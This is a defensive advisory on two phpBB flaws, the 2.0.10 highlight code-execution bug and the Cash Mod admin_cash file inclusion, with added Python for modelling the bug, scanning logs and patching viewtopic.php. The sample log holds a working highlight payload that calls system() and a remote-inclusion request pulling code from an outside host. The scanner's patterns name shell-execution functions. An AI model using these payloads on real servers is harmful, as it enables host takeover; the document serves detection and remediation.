1. Introduction:
phpBB is a free web forum package. Two serious vulnerabilities were recently found in it, and the Technical Service Center (技服中心) has observed intruders already exploiting them in live attacks. Both allow an attacker to execute arbitrary system commands and, from there, install a backdoor and take control of the whole host. They are the phpBB "highlight" vulnerability and the phpBB Cash Mod "admin_cash" vulnerability.
2. Technical details:
a. The phpBB highlight vulnerability
In phpBB 2.0.10, viewtopic.php runs an extra urldecode() over the highlight request variable. PHP has already decoded the query string once and phpBB's common.php has already backslash-escaped quotes in every request variable, so decoding a second time turns a double-encoded single quote (%2527) back into a bare quote after the escaping step. The resulting value is spliced into a preg_replace() replacement expression that phpBB evaluates with the /e modifier, so a crafted highlight value can close the quoted string and have attacker-supplied PHP executed, and through it arbitrary system commands.
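To make the decoding mistake concrete, here is an added example (not phpBB code) that replays the request pipeline in Python: the web server's single URL decode, the quote escaping phpBB's common.php applies to request variables, the second urldecode() that only the 2.0.10 version performs, and htmlspecialchars(). The ordering follows phpBB 2.0.x's common.php and viewtopic.php as the advisory and the manual fix below describe them; the helper names are my own.

```python
"""Model of how phpBB 2.0.10's viewtopic.php handled ?highlight=, to show
why the extra urldecode() call let a double-encoded quote through.
Added example, not phpBB code: it replays the PHP request pipeline
(server decode -> phpBB's addslashes() -> urldecode() -> htmlspecialchars())
in Python so the two versions can be compared on the same input."""
import html
from urllib.parse import unquote_plus


def php_addslashes(s: str) -> str:
    """PHP's addslashes(): backslash-escape ', ", \\ and NUL.  phpBB's
    common.php applies this to every GET/POST value (PHP's own
    magic_quotes_gpc does the same), so a quote can no longer end a string."""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace('"', '\\"')
             .replace("\x00", "\\\x00"))


def php_htmlspecialchars(s: str) -> str:
    """htmlspecialchars() with the default ENT_COMPAT: escapes & < > and
    double quotes but leaves single quotes untouched."""
    return html.escape(s, quote=False).replace('"', "&quot;")


def highlight_words(raw_query_value: str, patched: bool) -> list:
    """Word list viewtopic.php builds from the highlight parameter.

    raw_query_value is the percent-encoded text as it stands in the URL.
    patched=False reproduces 2.0.10, patched=True the 2.0.11 fix that
    drops the urldecode() call."""
    # 1. PHP fills $HTTP_GET_VARS: one round of URL decoding (+ becomes space).
    value = unquote_plus(raw_query_value)
    # 2. phpBB escapes quotes in every request variable.
    value = php_addslashes(value)
    # 3. The vulnerable release decodes a second time *after* escaping, so a
    #    %27 that survived step 1 (sent as %2527) becomes a bare quote here.
    if not patched:
        value = unquote_plus(value)
    # 4. htmlspecialchars() does not touch single quotes either.
    value = php_htmlspecialchars(value)
    return value.strip().split(" ")


def has_unescaped_quote(words: list) -> bool:
    """True if a word holds a single quote with no backslash before it: that
    quote closes the string literal inside the preg_replace() replacement
    (evaluated with the /e modifier), and whatever follows runs as PHP."""
    for w in words:
        for i, ch in enumerate(w):
            if ch == "'" and (i == 0 or w[i - 1] != "\\"):
                return True
    return False


if __name__ == "__main__":
    for raw in ("%27", "%2527"):
        for patched in (False, True):
            words = highlight_words(raw, patched)
            print(f"{'2.0.11' if patched else '2.0.10'} highlight={raw:6} -> {words!r} "
                  f"{'INJECTABLE' if has_unescaped_quote(words) else 'safe'}")
```

A single-encoded quote (%27) is escaped to \' in both versions and is harmless; only the 2.0.10 pipeline turns %2527 into a bare quote. Removing the second decode, as the fix in section 3 does, leaves %27 as a literal three-character string.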
b. The phpBB Cash Mod admin_cash vulnerability
The Cash Mod add-on running on phpBB 2.0.10 and earlier (2.0.10 included) does not validate its input in the admin_cash script, so a malicious user can make it include an arbitrary PHP file of their choosing and, through that file, execute arbitrary code and system commands on the server. The Cash Mod is a third-party modification rather than part of the phpBB distribution, so only boards that have installed it are affected.
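Since the introduction notes that both flaws are already being exploited, the following added example (not part of the advisory) sweeps web-server access logs for requests that match either attack. The log lines are constructed for the example; the path admin/admin_cash.php and the assumption that the Cash Mod flaw is triggered by passing a remote URL in a query parameter are my assumptions, not something the advisory states.

```python
"""Sweep of web-server access logs for attempts on the two phpBB flaws in
this advisory.  Added example, not from the advisory: the log lines are
constructed, and the admin_cash.php path plus the remote-URL query
parameter shape for the Cash Mod flaw are assumptions."""
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: client IP ... [time] "METHOD URL PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Browsers encode a quote once (%27).  The exploit needs it double-encoded
# (%2527) so it survives phpBB's quote escaping, and uses %252E ('.') to
# concatenate strings inside the injected PHP.
DOUBLE_ENC_RE = re.compile(r"%25(27|2e)", re.I)
# PHP calls that show up in injected code after a single decode.
PHP_CALL_RE = re.compile(
    r"\b(system|passthru|exec|shell_exec|eval|include|require|fwrite|fopen|chr)\s*\(", re.I
)
# Cash Mod admin script requested with a remote URL in a query parameter
# (classic remote-file-inclusion shape; path and parameter are assumptions).
CASH_RFI_RE = re.compile(r"admin/admin_cash\.php\?.*=(?:https?|ftp)(?:%3A|:)", re.I)


def highlight_value(url: str) -> str:
    """Return the raw (still percent-encoded) highlight= value of a
    viewtopic.php request, or '' if the request has none."""
    path, _, query = url.partition("?")
    if not path.lower().endswith("viewtopic.php"):
        return ""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() == "highlight":
            return value
    return ""


def classify(url: str) -> str:
    """Label a request URL: 'highlight-rce', 'cash-rfi' or '' (benign)."""
    hl = highlight_value(url)
    if hl and (DOUBLE_ENC_RE.search(hl) or PHP_CALL_RE.search(unquote(hl))):
        return "highlight-rce"
    if CASH_RFI_RE.search(url):
        return "cash-rfi"
    return ""


def scan(log_text: str) -> list:
    """Return (client_ip, label, url) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m.group("url"))
        if label:
            hits.append((m.group("ip"), label, m.group("url")))
    return hits


# Constructed sample: a Santy-style highlight exploit, an ordinary search,
# a Cash Mod inclusion attempt, and a legitimate search containing '%'.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Nov/2004:10:12:01 +0800] "GET /phpBB2/viewtopic.php?t=1&highlight=%2527%252Esystem(chr(108)%252echr(115))%252E%2527 HTTP/1.0" 200 5123
198.51.100.2 - - [18/Nov/2004:10:13:44 +0800] "GET /phpBB2/viewtopic.php?t=42&highlight=security+patch HTTP/1.1" 200 8890
203.0.113.7 - - [18/Nov/2004:10:15:09 +0800] "GET /phpBB2/admin/admin_cash.php?phpbb_root_path=http://198.51.100.9/x.txt? HTTP/1.0" 200 312
192.0.2.5 - - [18/Nov/2004:10:16:30 +0800] "GET /phpBB2/viewtopic.php?t=7&highlight=100%25+rate HTTP/1.1" 200 7001
"""

if __name__ == "__main__":
    for ip, label, url in scan(SAMPLE_LOG):
        print(f"{label:14} {ip:15} {url}")
```

The sweep deliberately ignores a single %27 in the highlight value, which ordinary searches containing an apostrophe produce and which phpBB escapes correctly; it keys on the double encoding the exploit needs, or on PHP function calls in the decoded value. A 200 status on a matching line does not by itself prove success, so treat hits as a trigger for checking the host for dropped files.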
3. Remediation:
a. The phpBB highlight vulnerability
1. Upgrade phpBB to version 2.0.11.
2. If you cannot upgrade immediately, patch viewtopic.php by hand as follows.
Locate the following code:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
for($i = 0; $i < sizeof($words); $i++)
{
Replace it with the following code (the only change is that the urldecode() call is removed from the explode() line, so the already-decoded and already-escaped request value is no longer decoded a second time):
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));
for($i = 0; $i < sizeof($words); $i++)
{
b. The phpBB Cash Mod admin_cash vulnerability
1. Upgrade phpBB to version 2.0.11. Note that the Cash Mod is a third-party add-on, so upgrading the phpBB core alone does not correct the mod; step 2 is still required on boards that have it installed.
2. If you cannot upgrade immediately, download the corrected Cash Mod package (Xore Upgrade CashMod222.zip) from the URL below and install it.
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
The same package applies to every affected release: phpBB Group phpBB 1.0.0, 1.2.0, 1.2.1, 1.4.0, 1.4.1, 1.4.2, 1.4.4, 2.0 Beta 1, 2.0 RC1, 2.0 RC2, 2.0 RC3, 2.0 RC4, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.6c, 2.0.6d, 2.0.7, 2.0.7a, 2.0.8, 2.0.8a, 2.0.9 and 2.0.10.
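To verify that both remediations have actually been applied to an installation, here is an added audit helper (not part of the advisory or of phpBB). It recognises the vulnerable explode(... urldecode(...)) line that the manual fix in 3.a removes, can rewrite it to the 2.0.11 form, and reports whether a Cash Mod admin script is present so that 3.b is not overlooked. The path admin/admin_cash.php is an assumption about where the mod installs its admin script; adjust it if your copy differs.

```python
"""Audit helper for a phpBB 2.0.x tree covering both fixes in this advisory.
Added example, not part of the advisory or of phpBB.  The Cash Mod path
below is an assumption."""
import os
import re

# The vulnerable call as shipped in 2.0.10 and the corrected 2.0.11 form.
VULN_RE = re.compile(
    r"htmlspecialchars\(\s*urldecode\(\s*\$HTTP_GET_VARS\['highlight'\]\s*\)\s*\)"
)
FIXED_RE = re.compile(r"htmlspecialchars\(\s*\$HTTP_GET_VARS\['highlight'\]\s*\)")
FIXED_CALL = "htmlspecialchars($HTTP_GET_VARS['highlight'])"
CASH_MOD_FILE = "admin/admin_cash.php"  # assumed location of the Cash Mod admin script


def check_viewtopic(source: str) -> str:
    """Classify viewtopic.php source: 'vulnerable', 'patched' or 'unknown'
    ('unknown' means the highlight block was not found at all, for example
    in a release that predates it or a heavily modified file)."""
    if VULN_RE.search(source):
        return "vulnerable"
    if FIXED_RE.search(source):
        return "patched"
    return "unknown"


def patch_viewtopic(source: str) -> str:
    """Apply the manual fix: drop the urldecode() wrapper around the
    highlight parameter.  Everything else in the file is left alone."""
    return VULN_RE.sub(FIXED_CALL, source)


def audit(root: str) -> dict:
    """Inspect a phpBB root directory and return a finding per file."""
    findings = {}
    viewtopic = os.path.join(root, "viewtopic.php")
    if os.path.isfile(viewtopic):
        # latin-1 maps every byte, so files in any charset round-trip intact.
        with open(viewtopic, encoding="latin-1") as fh:
            findings["viewtopic.php"] = check_viewtopic(fh.read())
    else:
        findings["viewtopic.php"] = "missing"
    cash = os.path.join(root, *CASH_MOD_FILE.split("/"))
    findings[CASH_MOD_FILE] = (
        "installed: upgrade the mod (CashMod222.zip); phpBB 2.0.11 alone does not fix it"
        if os.path.isfile(cash) else "not installed"
    )
    return findings


def fix_in_place(root: str) -> bool:
    """Rewrite viewtopic.php under root if it is vulnerable.  Returns True
    when a change was written; a .bak copy of the original is kept."""
    path = os.path.join(root, "viewtopic.php")
    with open(path, encoding="latin-1") as fh:
        original = fh.read()
    if check_viewtopic(original) != "vulnerable":
        return False
    with open(path + ".bak", "w", encoding="latin-1") as fh:
        fh.write(original)
    with open(path, "w", encoding="latin-1") as fh:
        fh.write(patch_viewtopic(original))
    return True


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, status in audit(root).items():
        print(f"{name}: {status}")
```

Run it as `python audit.py /path/to/phpBB2` to get a per-file status; call fix_in_place() only after reviewing the report, since it edits viewtopic.php directly. A 'patched' viewtopic.php together with an installed Cash Mod is still an exposed board until the mod itself is upgraded.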
4. References:
http://securityfocus.com/bid/11701/
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513